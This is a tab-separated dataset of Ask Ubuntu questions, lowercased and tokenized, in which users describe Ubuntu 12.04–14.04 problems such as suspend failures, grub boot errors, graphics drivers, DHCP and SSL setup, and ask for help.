449871	laptop fails to suspend or hibernate ( wakes up after 2-5 seconds without user interaction )	this all started happening after upgrading to 13.10 , now i am running 14.04 and still have the same issue . when i close the lid or i do sudo pm-suspend the laptop goes into suspend for 2-5 seconds and awakes by itself . same happens if i try to do hibernate . i have a gut feeling that something is awaking/taking the cpu out of suspend mode but i can not figure out what . any help troubleshooting this annoying issue ? edit : thanks to @ fabian , i was able to figure out that it looks like the ethernet card is misbehaving and even after i set the card to not wake up on lan ( either doing acpitool -w 3 or echo disabled > /sys/bus/pci/devices/0000:00:19.0/power/wakeup or echo igbe > /proc/acpi/wakeup , the laptop keeps waking up and showing this when i do acpitool -w device s-state status sysfs node -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . lid s3 *enabled 2 . slpb s3 *disabled 3 . igbe s4 *enabled pci:0000:00:19.0 4 . exp1 s4 *disabled pci:0000:00:1c.0 5 . exp2 s4 *disabled pci:0000:00:1c.1 6 . exp3 s4 *disabled 7 . exp4 s4 *disabled 8 . exp5 s4 *disabled pci:0000:00:1c.4 9 . ehc1 s3 *disabled pci:0000:00:1d.0 10 . ehc2 s3 *disabled pci:0000:00:1a.0 11 . hdef s4 *disabled pci:0000:00:1b.0 any idea how to proceed from there ? the network driver that igbe uses is e1000e
449873	installing problem	today i installed a fresh and clean windows 8.1 pro in legacy mode and the problem is when i am trying to install ubuntu latest version ( 14.04 ) or any other version of ubuntu , i get an option u have no other operating system or installed windows on your system . while on other side i have windows 8.1 . then how to install ubuntu with my current os windows 8.1 pro . problem is i 'm not getting the option of installing option with windows 8.1 ( along side option ) .ii m using sony vaio svf1521ksnw . and i already disable the secure boot and also turn off the fast start up .
449875	packard bell ts11hr touchpad scroll gesture does n't work	i 've installed ubuntu 14.04 on my packardbell ts11hr . scrolling by dragging right side bar on touchpad does n't work while two-finger dragging does work . is anything wrong with touchpad drivers ? is there any thing i can do ? it works on windows 7 & 8 .
449876	dhcp server & client	so i 'm having a bit of trouble getting my dhcp server to assign and ip address to my clients . i have the dhcpd.conf file configured to assign a range of ip address to my clients as follows : default-lease-time 600 ; max-lease-time 7200 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.0.255 ; option routers 192.168.0.254 ; option domain-name-servers `` tindo.com '' ; option domain-name `` ns.tindo.com '' ; subnet 192.168.0.0 netmask 255.255.255.0 { interface eth1 ; range 192.168.0.103 192.168.0.110 ; } between a few examples that i 've seen , some people have put the `` options '' within the subnet part of the code . i 'm not sure if that matters or not . on my client , i have its network interface file configured as follows : auto lo iface lo inet loopback auto eth1 iface eth1 inet dhcp after i have configured the dhcpd.conf file , i tried to start the dhcp server with the command sudo service isc-dhcp-server start however , when i do , it says that the job failed to start . any know what may be causing this ? this is my first time trying to run a dhcp server , so i get the feeling that i 'm over looking something . thank you for your time .
449881	global menu bar wont refresh ?	while the question itself may sound vague , basically what is happening is when i minimize an application ( firefox for example ) all the options as well as the option to minimize maximize or close stay in the global menu bar until i click onto the actual desktop . is this an error thats always been around that i havent noticed or is it new popping up in 14.04 ?
449892	sound indicator issues after upgrading to 14.04	i upgraded t 14.04 yesterday and now the sound indicator disappears every time i run pithos . also the media keys do n't work . i tried showkey , and the system reads the keys fine , but nothing happens . is this a known bug or is something else wrong with my system ?
449898	cpu temperature monitor for 14.04lts ?	is there a way to configure psensor so the temperatures read out in real time in the panel so it could be read at a glance ? so far , in order to read the temperature i have to click on the applet indicator . on 12.04 i had a hardware indicator sensors by alex murray that did that job fine but it does n't work in 14.04 ( can anyone verify ? i 'm getting an `` e : unable to locate package indicator-sensors '' ) . i ended up starting to use psensor again and it only shows the temp in unity ( my unity is on auto hide ) .
449899	installing ubuntu in a mac	i have installed mavericks on my pc , now i want to install ubuntu 14.04 but i 'm not sure which file should i download : 64-bit or 64-bit mac .
449901	vlc icon in tray not coloured but white in ubuntu 14.04	how can i set vlc icon tray in the same white colour as the other icons ? i 'm running ubuntu 14.04
449905	wrong kernel after upgrade -- - old kernel still installed ?	i just upgraded from 13.10 to 14.04 , but when i do uname -r , it says i have kernel 3.11 . i want to have the default 14.04 kernel , ( 3.13 i believe ) . how can i get this ?
449906	what was the default font of gedit on ubuntu 10.04 ( lucid ) ?	i just upgraded from ubuntu 10.04 to lubuntu 14.04 and i installed the latest version of all the programs that i had on my previous computer . i installed the latest gedit 3.10.4 version and a lot has changed from the previous version i had on lucid ( 2.3 ) . i really liked the font of the old lucid version and i 'm uncomfortable with the new version having a new different font from the other . so , i would like the font of the current version to be that of the old gedit version 's . does anyone know the default font used by gedit 2.3 version of ubuntu 10.04 ? you can see screenshots of the old version below :
449907	ubuntu overheating due to both graphics cards	i installed ubuntu 12.04 problem is that it overheats since its using both of my graphics card . i have an nvidia geforce and intel integrated graphics card . any recommendations ? thanks
449911	ubuntu on nokia n8	i have a nokia n8 , with nokia belle os . why can you only install ubuntu touch on nexus phones . should n't it be posible to install it on any phone . if you delete the original os .
449915	ubuntu 14.04 is too slow	after a successful fresh install of ubuntu 14.04 ( from usb flash drive ) everything is much slower than in previous versions of ubuntu on the same computer . it takes a few seconds to open a window or to close a window ( even a terminal window ) . when i type a text in the vi editor , the characters appear on the monitor much slower than i type them . when moving a window , the window does n't follow the mouse . i never had this problem with previous versions of ubuntu . my hardware : ⠀processor : amd opteron ( tm ) processor 254 2800mhz ⠀ram : 4 gb ddr ⠀hard drive : st31500341as ( 1500gb ) ⠀graphics : nv43gl [ quadro fx 540 ] thank you for any help or advice .
449922	juniper network connect on ubuntu 14.04 can not find 32 bit java	i have ubuntu x64 and trying to install juniper network connect . installed 64bit jre/jdk , icedtea and 32bit jre sudo apt-get install openjdk-7-jre icedtea-7-plugin sudo apt-get install openjdk-7-jre : i386 command update-alternatives -- config java shows that java-7-openjdk-i386 is intalled and selected selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1071 auto mode 1 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1071 manual mode * 2 /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java 1070 manual mode but when i 'm trying to install network connect recieved following error : '' setup failed . please install 32 bit java and update alternatives links using update-alternatives command . for more details , refer kb article kb25230 `` these steps worked fine on ubuntu 12.04 x64 and i 'm wondering why it does n't work on 14.04
449925	amd graphics power management support in trusty tahr 's kernel	i upgraded to 14.04 just today and since i 'm now using kernel v3.13 and according to this link , i should now be having power management enabled by default how can i confirm that ? my machine : dell inspiron se 7520 my gpu ( discrete\independent graphics card ) : amd radeon hd 7730m my apu ( graphics card integrated into the processor ) : intel速 ivybridge mobile
449926	laptop wont ' boot up after upgrade to ubuntu 14.04	my laptop runs windows 7 and i install ubuntu 13.10 on my usb drive . and my boot loader is on usb drive . but after i update to ubuntu 14.04 , i ca n't boot to windows , it said 'error : no such device a517b4990b4d04340eac30-343-434 entering rescue mode ... grub rescue > how can i fix this ? i think the upgrade process mess up my laptop windows 7 boot loader . and when i try to boot to ubuntu ( when my usb drive is connected ) , i get this error error : symbol 'grub_term_highlight_color ' not found . entering rescue mode ... . grub rescue > now my laptop is not useable since both bootloader is messed up . thank you . i tried this : http : //forums.opensuse.org/showthread.php/492285-unable-to-boot-after-upgrading-to-13-1-grub_term_highlight_color-not-found but it said 'grub2-install ' and 'pwd ' unknown command .
449928	error while configuring new kernel ?	i 'm trying to configure a new kernel and installing modules but i always get this problem /lib/modules/3.14.1/kernel/fs/f2fs/f2fs.ko~ at /usr/src/linux-3.14.1/scripts/sign-file line 417. make [ 1 ] : * [ fs/f2fs/f2fs.ko ] error 28 make : * [ modinst ] error 2 i do n't know whats wrong can you help ?
449930	ubuntu 14.04 low graphical settings error ; not booting macbook 4,1	upon the first boot after installing 14.04 , i receive a black screen with only a message stating my display , graphics card and input settings could not be detected correctly . of the 7 times i have booted up to try to resolve this issue , i have only been able to bypass this first error message twice , only to have a blank white screen appear with no options . i currently have the grub bootloader timer set to `` 0 '' , so i ca n't even access recovery mode to even attempt to recover my files . any advice or help ? edits : i have intel gma x3100 144 mb . i am not able to access the terminal or anything whatsoever after attempting to boot . grub does not appear when i hold shift , as shift does not work when the timeout is set to `` 0 '' . i attempted to install on my current main ubuntu partition .
449932	blender - bad edge overlay amd	have anyone seed this error before ? when selecting vertex , instead of semi hightlighting adjacent edge , it hightlits whole or none of it . i tried to fill bug report but i was told that its not their problem . is there anything i can do to fix it ?
449934	nautilus progress bar not visible on ubuntu 14.04	i just updated my computer this morning to ubuntu 14.04 and that 's amazing , i really liked this update ! the problem is , when i was moving my files from the extern hd to my computer , the usual progress bar that nautilus shows did n't appear . so , i ca n't see how much data as already moved and the estimated time left . how do i get the progress bar ?
449935	unable to download cisco anyconnect secure mobility client from web launch	i have installed ubuntu 12.04 recently , which is the only os on my pc . when try to download the cisco anyconnect secure mobility client from web launch windows executable file appears instead of linux . please help . looking for similar file mentioned in this site https : //faq.oit.gatech.edu/content/how-do-i-install-cisco-anyconnect-client-linux
449937	amilo v8210 cpu fan speed issue	i got a fujitsu-siemens amilo pro v8210 with intel® core™2 cpu t5500 @ 1.66ghz × 2 and have installed ubuntu 13.10 . cpu fan issue as many others . checked the bios settings , nada . bios is updated . when using `` sudo pwmconfig '' i get : '' /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed . '' when using `` sudo sensors-detect '' the only success i get is : intel digital thermal sensor ... success ! ( driver `coretemp ' ) and probing for super-i/o at 0x2e/0x2f trying family `national semiconductor/ite ' ... yes found unknown chip with id 0xf411 and using driver `i2c-i801 ' for device 0000:00:1f.3 : intel 82801g ich7 module i2c-i801 loaded successfully . module i2c-dev loaded successfully . at the bottom it gives me : driver coretemp ' : * chipintel digital thermal sensor ' ( confidence : 9 ) and the below statement has been added to `` /etc/modules '' : chip drivers coretemp edit : just installed psensor and it shows both cpu cores at 39 c. i cant see how to solve the nerve-cracking issue of cpu fan working all the time . it makes me wan na remove and change to another os . any help greatly appreciated !
449940	certain fonts look too small after upgrading	i upgraded to ubuntu 14.04 today and after that certain fonts are looking smaller than they were before , i tried changing that from the gnome-tweak-tool as well as unity-tweak tool , the size increases in chrome and other windows but does not in nautilus as well as the tabs in chrome i am currently using unity ( the one which came default with 14.04 ) , the fonts before : the fonts in nautilus are small as well as the ones for the tab names , this is after increasing the font size : the bookmark size increased but the filename font size as well as the tab caption did not . any ideas on how to fix this ?
449942	how to change my default home directory	right now `` collin-blatt '' has the home icon on it . that is where my files are located by default . i want to delete that and make `` collinblatt '' the default .
449943	`` com.canonical.unity.webapps schema is missing '' - what does this mean ?	com.canonical.unity.webapps in order to work properly , unity tweak tool recommends you install the necessary packages
449944	how can i make windows go fullscreen when snapping to the top of the screen in xfce ?	you know how in unity when you grab a window and snap it to the top of the screen it will go fullscreen ? im currently using xubuntu but when i snap the window to the top it will just fill the top half of the screen . i wan na know if there is a way in xfce to make windows go full screen when snaping to the top while still keeping that `` mosaic '' snap just in the sides . thanks .
449945	installion frozen on bcmwl-kernel-source configuration	while installing on an hp paviliion , install has frozen on configuring bcmwl-kernel-source .
449947	dealing with password expiration from ad with likewise	we are running machines with ubuntu 12.04 lts , associated with our ad via likewise . when logging in , we get the warning that the password is going to expire , however , we are unable to actually change the password at log in and push those changes through active directory . anyone have any suggestions on how to get around such a problem ? thanks !
449951	how to fix ubuntu load screen after install nvidia driver ( 331,38 )	i installed nvidia proprietary driver ( 331.38 on ubuntu 14.04 by sudo apt-get install nvidia-331 ) and now the ubuntu load screen is with a bad resolution ( 640x480 ) . i followed some recommendations from previous questions but i can not increase the resolution . i would like to return to 1920x1080 resolution .
449952	ubuntu 14.04 supported drivers for hd4850	are there drivers that will work for the amd hd4850 with ubuntu 14.04 ? i checked this page which indicates that the only supported drives would require a kernel downgrade to 3.4 . are there really no drivers with full compatibility for the hd4850 with ubuntu 14.04 ? ?
449955	will my ssl keys be removed if i re-install apache2 ?	i already have my csr and key . but i tried to configure apache server and messed everything there . if i am going to re-install it again do i need to have a new csr and key to activate https or can i still use it again ? if that 's possible . how can i re-install apache2 ? give me the command line code for it ? i am really new with it . i 'm working on my vps .
449960	lamp in ubuntu instance - openstack	i have installed openstack using devstack on a single machine and i have to develop a private cloud document management system and i just want to provide storage of documents on the cloud , nothing else . my question is that would i have to launch a ubuntu instance and deploy my website pages in that instance using lamp ? and how will i be able to store my documents in swift ? or i can store on openstack host ?
449961	ca n't upgrade from ubuntu 12.04 to 14.04 because of /tmp	can not run the upgrade this is usually caused by a system where /tmp is mounted noexec . please remount without noexec and run the upgrade again . i am very much a newbie and have no idea how to 'remount ' the /tmp file .
449963	14.04 upgrade not appearing on update manager	i have 12.04 lts with all software up to date and `` notify me of new long term support versions '' selected on settings , but there 's no mention of 14.04 . `` there are no updates to install '' is the persistent message . i have tried both the main server and the uk one , but to no avail . am i missing something obvious ?
449969	on xubuntu 13.10 ar8162 wired internet disabled on asus 1015e-ds03	i have an asus 1015e-dso3 laptop . it came with ubuntu 12.04 installed , and everything was fine , except that the laptop came very strangly partitioned . there was about 150gb worth of space that was n't being used and no partition manager would let me access so i could use it . finally being a kde fan at heart i decided to wipe it clean & just install kubuntu 12.04 everything is working fine except for some reason i only have wireless internet & ca n't get my wired internet working . i have enabled backports and performed all updates and my laptop tells me there are no restricted drivers available . i 've tried to provide as much info as possible so here 's the output of varun 's wireless script , it seems to do a pretty thorough job , even though it 's my wired internet that 's giving me trouble you can find that here http : //paste.ubuntu.com/7277571/ the output of sudo lshw -c network `*-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 6c:71 : d9:7f:9b:9d width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-58-generic firmware=n/a ip=192.168.1.111 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7d00000-f7d7ffff memory : f7d80000-f7d8ffff *-network unclaimed description : ethernet controller product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 version : 10 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list configuration : latency=0 resources : memory : f7c00000-f7c3ffff ioport : e000 ( size=128 ) ` the output of ifconfig -a `lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5406 errors:0 dropped:0 overruns:0 frame:0 tx packets:5406 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:542537 ( 542.5 kb ) tx bytes:542537 ( 542.5 kb ) wlan0 link encap : ethernet hwaddr 6c:71 : d9:7f:9b:9d inet addr:192.168.1.111 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :6e71 : d9ff : fe7f:9b9d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14215278 errors:0 dropped:0 overruns:0 frame:0 tx packets:4228474 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:20103309745 ( 20.1 gb ) tx bytes:495036621 ( 495.0 mb ) `
449972	remove the first window when starting from usb	i burn ubuntu in a pen-drive . but each time i start with ubuntu i need to change the configuration and select the option that i want to try ubuntu not install removing my laptop operative system . what can i do ? i found somewhere that an option is to install the system on the pendrive . but i found i need 8gb on the pen-drive , and following the manual i set just ~2500mb of persistent size for storing ( step 4 in the window of the universal usb installer ) . how can i install it persistent on the pen-drive ? or i have already done so ?
449975	touchpad multitouch is not working on 14.04	navidda @ myleno : ~ $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] i have a lenovo z511 and the touchpad seems to be detected as mouse . i had the same problem on 13.10 : -/
449977	which ppa has the most current version of git for 12.04 ? ppa : git-core/ppa is outdated	just installed git via ppa : git-core/ppa and got 1.7.9.5 when the current version is 1.9.2 . $ sudo add-apt-repository ppa : git-core/ppa you are about to add the following ppa to your system : the most current stable version of git for ubuntu . for release candidates , go to https : //launchpad.net/~git-core/+archive/candidate . ... $ sudo apt-get install git reading package lists ... done building dependency tree ... $ git -- version git version 1.7.9.5 ... as a bonus question , why are n't there more deb packages for widely used apps like git ? i know apt-get works fine but i find the ppa system to be kinda haphazard . i do n't know if debs would be any better ; just wish something better existed . there 's no tarball at http : //code.google.com/p/git-core/downloads/list for 1.9.2 . grrr .
449978	very slow conversion with avconv ( libav ) - trusty tahr 14.04 ?	yesterday i installed the latest kubuntu release 14.04 . so i meet a little problems with the media conversions . the old ffmpeg is finally replaced with avconv which is in the libav-tools library . till now i was using ffmpeg and every mp4 or flv to mp3 conversion was very fast . for example if one file around 5mins length was converted for ~20secs , now the same file is converted ~3-4-5 times slower . i read everywhere , but could not find where is the problem.. is there any cure about that ? best regards : )
449980	trying to frugal install parted magic alongside 14.04	ive been using the 40_custom method to add an entry for partedmagic it looks like this : menuentry 'parted magic ' { set root='hd0 , msdos1' linux /parted/pmagic/bzimage root=/dev/sda1 directory=parted edd=on vga=normal initrd /parted/pmagic/initrd.img } i then save the 40_custom file and proceed to sudo update-grub this configuration worked ok with 13.10 but now with 14.04 it just sits at the purple screen frozen . i however did make a slight change in the installation of 14.04 i chose to install with lvm enabled maybe this is the problem ? i changed the default directory for parted magic from /boot to /parted the parted magic squashfs files are in the /parted directory to avoid conflicts .
449983	desktop session settings not saved	so i am one of those people who just moved from xp to [ l ] ubuntu . i am used to being able to control whether programs autostart , and assumed checking or unchecking the desktop session settings ( from the preferences menu ) would act the same way . my changes , however , are not saved . ... does anybody know how to control which programs/processes autostart ?
449988	ubuntu stuck in unusable console on boot	i ran some updates on my old pc on ubuntu but it hanged and i had to restart it . the mouse no longer worked and the screen resolution seemed to be incorrect . so i restarted again and now after the splash screen i get the a console telling me to log in . it only stays there for 2 seconds and then it just clears rhe screen and a blinking cursors appears and i ca n't type anything . if i press the power button it prints some messages indicating that it 's shutting down . there are no error messages . i tried entering grub by pressing thr shift key , but that does n't work . is there any other way i can recover from this ? i am using ubuntu 12.04
449989	ubuntu 14.04 lts : bluetooth not working	i updated from ubuntu 12.04 lts to 14.04 lts . now , i can send files to my phone from pc but the reverse is not possible . there 's a small lock sign subscripting the bluetooth icon in menu bar . does this lock signifies anything ? is it the reason i ca n't send files from my phone to pc ? how can i send files from phone to pc ? dear ubuntu lords , help . thanks .
449993	unable to write usb loader to stick	make startup disk fails with many line of problems with 'phyton ' in it 2 dif programs react the same , ie not ready to write to usb it appear like 'phyton ' code is responsible like fails to refresh its stored info.. first ask try good ? cleared usb stick not cleared by erase . i used disk std program to clear last bits and format fat normally , ..so i was fooled by well..
450001	installing mariadb on ubuntu 14.04	how can install mariadb on ubuntu 14.04 , i have searched in ubuntu software center but its not there . then checked mariadb official website but its clearly mentioned there are some issues in .deb file for ubuntu . can i download the .rpm file which is for redhat and then onvert it into .deb by using alien command . would it be fine ? as mentioned here . ubuntu 14.04 lts continues to provide official support for mysql 5.5 . three other community supported alternatives of mysql are also included : mariadb 5.5 - a drop in replacement for mysql 5.5 .
450007	amd screen-brightness adjustment issue with trusty tahr	i upgraded to 14.04 just today and since i 'm now using kernel v3.13 and according to this link , i should now be having better support for amd grapahics . is it possible to fix the screen-brightness adjustment issue after this upgrade ? i simply ca n't change the brightness of my screen . there were numerous solution attempts for this problem on 13.10 but i experienced system-freezes afterwards . is there a stable solution for this now that i 've upgraded to trusty ? my machine : dell inspiron se 7520 my gpu ( discrete\independent graphics card ) : amd radeon hd 7730m my apu ( graphics card integrated into the processor ) : intel速 ivybridge mobile
450009	initramfs installation issue	i have a computer , with no cd drive , with no operating system on it . something went wrong while i was resetting xp and the computer now has no operating system . i am currently trying to install linux on it via a usb drive . i only have access to a mac and this computer . i used unetbootin to load ubunto 12.04 [ live ] onto a usb drive . i then try to boot from the usb and it stops at this message : '' - busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help for a list of built-in commands . ( initramfs ) '' details on the computer : asus 1005ha acpi bios revision 1601 processor intel atom , 1.6ghz , system memory : 1024mb ide configuartion ata/ide config . = [ compatible ] ( options compatible & enhanced ) boot device priority = ( usb : lexar usb flash ] quiet boot = enabled onboard lan boot rom - enabled a 'screenshot ' of the screen at cessation http : //postimg.org/image/556qag42h/
450011	amd graphics switching support in trusty tahr 's kernel	i upgraded to 14.04 just today and since i 'm now using kernel v3.13 and according to this link , i should now be having automatic gpu switching how can i confirm that ? how can i force my graphic cards to do so ? my machine : dell inspiron se 7520 my gpu ( discrete\independent graphics card ) : amd radeon hd 7730m my apu ( graphics card integrated into the processor ) : intel速 ivybridge mobile
450012	openjdk install problem	i try to install on a fresh install of ubuntu 12.04 , and all it gives me is this error . `` the action would require the installation of packages from not authenticated sources . '' last time i installed it , it worked fine . now when i try to repair , it just sits there for hours doing nothing .
450014	gnome-panel broken with xmonad session in 14.04	in 14.04 , i 've installed both gnome-session-flashback and xmonad . when logging in using lightdm and the xmonad+gnome session , the gnome-panel is broken , with half the indicators missing . when logging in with a flashback session , and then running xmonad -- replace , everything works as expected . i 've tried copying the requiredcomponents line from /usr/share/gnome-session/sessions/gnome-flashback.session to xmonad.session ( replacing metacity with xmonad ) but it does n't help . i guess something is still missing with my xmonad.session . what ?
450015	`` error while getting interface flags : no such device '' for wlan0	error message on boot re kernel wireless . i tried running sudo ifconfig wlan0 up and it returns error while getting interface flags : no such device
450017	upgrade to ubuntu 14.04	yesterday 17/04/14 i tried an upgrade from ubuntu 13.10 to 14.04 . the process went fine without error messages . then came the reboot and it stuck booting . all booting messages went through then it stuck with black screen . i tried it several times but always it stuck with a black screen . my system is switched ( with xdiagnose ) to show the booting lines during the process . but at the end there remains now a black screen . when i pressed for reset the console text lines appaered again for the shut down . the last lines which get visible again look like the last problem , where it stuck was to get the name of a server . but i do n't know what server . it seems it has to do something with apache . sorry i ca n't explain it better . now i have downloaded the new iso-image . but before installing it with overwriting all my data from 13.10 i would like to know if there is maybe a simple reason and easy to make it continue in the booting process . for security before upgrading i have backed up the whole home-directory of 13.10 . so i think i have my most personal data like documents , media-files , email . but still i would like to make it continue as it was installed in the upgrade . now i have tried once more to recognize where it starts stucking . immediately after pressing reset appeares as last paragraph : '' starting web-server apache ... '' with two or three following lines . but it is so fast i could not recognize more . but there it seems to stop . somebody knows how to solve it ? now having got no solution , i have burnt the ( officially from ubuntu ) downloaded image for ubuntu desktop 14.04 on a dvd . but it does n't boot from that dvd . of course i have put that dvd drive on top of the stack of devices to boot . as at the moment i just can work with windows 7 i had tried to burn it with that . windows rejected to burn the image . i had to do it with a downloaded burner . what can cause that problem now ? to continue with that story : now i found a way to burn the image on a dvd . i took the amd64-image and with that it was no problem . ubuntu gave me the option to `` reenstall '' the already installed 14.04-distribution . so my data remained in home-directory . but : i did n't know that my machine is able to run 64-bit as it is an intel processor but the machine has more than 2g ram , exactly 5,8g . so the whole installation ran smoothly and ubuntu is there again with 14.04 . but : now i need a new driver for my nvidia gforce . the former driver was rejected as not compatible with the 64-bit . i found that other driver and when i wanted to install it in the terminal with sh i was called first to stop the x-server . it can not be installed with running x-server . so the next question : how to stop the x-server ? or : how to boot till console without starting the x-server ? somebody can tell me so that i even can understand it ?
450018	`` ubuntu '' shows up in boot menu but wo n't boot	i just installed ubuntu 12.04.4 on an acer mini desktop via cd over an old debian install from a year ago ( which , incidentally , booted without incident ) . i blew away windows long ago , no dual-boot , used entire disk . when it finally asked me to remove install media and reboot , all i get is a blank screen with a solid underscore cursor . i found that if i bring up the f12 menu at boot , it has these options : ubuntu uefi : hitachi hds7210 ... p1 : atapi dvd a dh16absh if i try to boot off the default , or explicitly through the f12 menu `` ubuntu '' item , it wo n't boot -- blank screen , solid underline cursor . if i boot off the uefi : hitachi option , it boots ubuntu perfectly . no usb drives , no cd 's in the drive , no other hard disks , just the one that ubuntu 's installed on . ran boot-repair-disk , my results : http : //paste.ubuntu.com/7277227 please do n't ask me to hit f12 every time ... any ideas on how to fix this ? thanks .
450020	how to install ssl cert on apache2 ubuntu 12.04	i manage to install apache2 in my ubuntu 12.04 vps . now my question is how is it really going to install ssl cert to make my site https : // ? i already followed this tutorial from digital ocean , but i failed . https : //www.digitalocean.com/community/articles/how-to-create-a-ssl-certificate-on-apache-for-ubuntu-12-04 i also tried this one , but still i failed . https : //support.comodo.com/index.php ? _m=knowledgebase & _a=viewarticle & kbarticleid=1203 & nav=0,96,1,95 i already have my 90-day free trial ssl cert from instantssl . here 's what i have : .ca-bundle and .crt from instantssl . and i already do have my .csr and .key using this command . openssl req -new -newkey rsa:2048 -nodes -out www_gremdev_com.csr -keyout www_gremdev_com.key -subj `` /c=ph/st=misamis oriental/l=cagayan de oro/o=gremdev ltd/ou=it/cn=www.gremdev.com ''
450021	ubuntu 14.04 microphone static	i have n't found any other askubuntu questions that i 'm actually looking for.. so , every time i use my internal microphone , whether its during a skype call or when i 'm testing it on the gstreamer-properties program , there is horribly bad static . i was attempting to skype with my girlfriend earlier , but the static was louder then i was and she could barely make out what i was saying . i have the latest version of skype and everything is updated . i 've attempted to change the microphone volume , did n't work . i tried changing from pulseaudio to an alternative , alsa and oss ? i believe , did n't work . i have windows 8.1 as my dualboot and the microphone works fine on there , so it is a ubuntu 14.04 issue . i 'd like to have it fixed because skyping is one of my top priorities and if i ca n't have a call without the static , i 'm gon na be forced to go back to using windows all-time . please help guys , i like ubuntu a lot and i 'd just like to find a fix for this ! : )
450022	how can i assign the super function to the right windows key ?	i have just installed ubuntu gnome 14.04 . currently i can only open the , um , `` dash '' ( ? ) only with my left windows key . i 'd like to use the right windows key as well for the super function . how can i assign super to the right windows key on my cherry evolution xstream xt keyboard ? edit the right windows key works as super ootb on xubuntu 14.04 .
450024	squid as proxy is only allowing https traffic	i have installed squid with dansguardian and configured it exactly as instructed here . it works fine for https traffic , which is allowed through just fine . however , squid does n't allow any http traffic through . instead , the browser displays a page generated by squid that states that i am not allowed to access the requested resource . what i want is squid to allow all traffic through . it is not a firewall ; it is there simply to allow dansguardian to do its work . any help would be appreciated !
450025	unity tweak tools missing schema in 14.04	when i try to start up unity tweak tool in 14.04 , it throws up a window that says : '' the following schema is missing : com.canonical.unity.webapps in order to work properly , unity tweak tool recommends you install the necessary packages . '' i have no removed this package , i only turned them off in the privacy settings . however , looking in synaptic does n't show these to even try to reinstall them . i have no idea why these would be missing . any help would be greatly appreciated .
450028	how do i set the tld for the hostname ?	there is a bug in etckeeper with git in 14.04 trusty tahr where there is needed the tld in the hostname . my solution as a workaround was to think of a fantasy tdl and set it with : hostname myhostname.nonsense.com then the upgrade-manager could continue its work . but i guess that is not the best way to set the tld . how do i set the tld correctly ?
450030	strange , but interesting display dependend input behavior	i think this may be related to my previous question , or it may be something else . sorry if this is rather long . i hope this is not too confusing , but my issues are hard to explain . i am seeing strange behaviour with some applications , but only on certain displays . here are some of the symptoms : keyboard delay seems different on different displays ( attached to different video cards ) for example in a gnome terminal there is a slight delay for the first key pressed , but when a key is held down it moves right along . if i move the same window to another display the delay is gone if i move it back to the other display it is back . tabs on windows : if i do n't `` hover '' over a tab before clicking it , the tab will not become active after i click it until after i move the mouse . again only on 1 display and not the other . xterm : when i do something like type ls i may get a partial list of the directory contents , but not the full result . ( it sort of pauses ) . if i move the mouse it finishes . i am trying to run multiple display cards and the differences show up between displays attached to the different cards - but it is not specific to a card . i can swap the order that the cards are initialized in the bios and move the problem to the opposite card any idea 's ? update : this seems to be affected by the compiz composite plugin . if i disable that plugin , unity is broken , but the behaviour i described above seems to be gone . not sure if this matters or not but i see the following in /var/log/xorg.0.log [ 40.932 ] ( ii ) radeon ( g0 ) : set up textured video [ 40.932 ] ( ii ) radeon ( g0 ) : [ xvmc ] associated with radeon textured video . [ 40.932 ] ( ee ) radeon ( g0 ) : [ xvmc ] failed to initialize extension .
450032	ubuntu 14.04 not booting from cd , showing other massage	i burned a dvd , after downloading ubuntu 14.04 64 bit iso . from then , i tried several times to boot from the dvd [ multiple ] getting below message : '' my laptop is dell vostro 3450 '' intel undi , pxe-z.1 ( build 803 ) copyright ... . intel corp . this product is covered by one or more of the following patents : us5 ... .. realtek pcie gbe family controller series v2.35 ( 06/14/10 ) pxe-e61 : media test failure , check cable pxe-m ) f : existing pxe rom . as i am currently using linux mint 16 cinnamon , showing below massages too : login : acpid : existing [ 38.802986 ] end_request : i/o error , dev sr0 , sector 0 [ 38.803011 ] buffer i/o error on device sr0 , logical block 0 udevd [ s40 ] : '/sbin/blkid -0 udev -p -u noraid /dev/sr0 ' [ 606 ] terminated by signal 15 ( terminated ) [ 44.715121 ] end_request : i/o error , dev sr0 , sector 0 [ 44.715146 ] buffer i/o error on device sr0 , logical block 0 please help me providing your valuable answer . please ... please . thanks
